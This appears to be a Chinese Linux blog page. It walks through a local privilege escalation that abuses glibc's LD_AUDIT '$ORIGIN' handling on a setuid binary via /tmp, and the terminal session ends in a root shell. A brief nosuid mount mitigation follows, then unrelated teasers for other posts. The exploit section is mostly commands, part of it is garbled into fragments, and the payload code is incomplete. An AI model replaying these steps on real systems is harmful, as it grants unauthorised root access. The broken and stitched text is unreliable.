以乙個普通使用者登入
[hello@localhost tmp]$ ls -ld /tmp/ 因為tmp目錄能寫檔案!!
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[hello@localhost tmp]$ cd /tmp/
[hello@localhost tmp]$ mkdir exploit
[hello@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[hello@localhost tmp]$ exec 3< /tmp/exploit/target 檔案描述符,把/tmp/exploit/target定義為檔案描述符3
[hello@localhost tmp]$ ls -l /proc//f
d/3l
r−x−
−−−−
−1he
lloh
ello
6410−20
09:30/
proc
/10990/f
d/3−
>/t
mp/e
xplo
it/t
arge
t[he
llo@
loca
lhos
ttmp
]$rm
−fr/
tmp/
expl
oit/
[hel
lo@l
ocal
host
tmp]
$ls−
l/pr
oc//fd/3lr−x−−−−−−1hellohello6410−2009:30/proc/10990/fd/3−>/tmp/exploit/target[hello@localhosttmp]$rm−fr/tmp/exploit/[hello@localhosttmp]$ls−l/proc/
/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[hello@localhost tmp]$ cat > payload.c 高階系統管理員必須要把c學的很明白!!
void __attribute__((constructor)) init()
[hello@localhost tmp]$ gcc -w -fpic -shared -o /tmp/exploit payload.c
[hello@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[hello@localhost tmp]$ ld_audit="\$origin" exec /proc/self/fd/3 定義環境變數
[root@localhost tmp]# whoami
root
--------------
-一般不開777許可權目錄的. 如果要則
對777的目錄做如下操作,可以控制你提權的.比如/tmp
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp nosuid 不允許執行suid許可權
Linux利用date進行日期計算
利用date進行時間計算 兩天前 date y m d d 2 day 2007 2 12 前14天是什麼 date y m d d 2007 02 12 14 day 十分鐘之前 date m d h m d 10 minute 例如 angus date m d h m 02 10 11 06 ...
Linux臨時目錄 tmp與 var tmp
linux有兩個公知的臨時目錄 tmp與 var tmp,這兩個目錄被使用者用於儲存臨時性的檔案,亦經常被程讀寫使用者儲存臨時性資料。兩個目錄沒有本質上的區別,最根本的區別僅僅是系統對其中檔案清理的預設時間配置不一致。redhat6系,可在檔案 etc cron.daily tmpwatch中檢視到...
Linux下對檔案內容進行篩選提取
前言 在linux環境下通常需要對某個日誌檔案或者一些其他檔案進行內容的提取或者篩選,而這些在沒有強大的工具的情況下我們只能通過命令拼接進行提取,以下對檔案內容提取篩選做出整理以及演示 簡單命令整理 cat 開啟檔案命令 awk 檔案分析命令 管道 檔案操作 print 新檔案中輸出 新檔案輸出的內...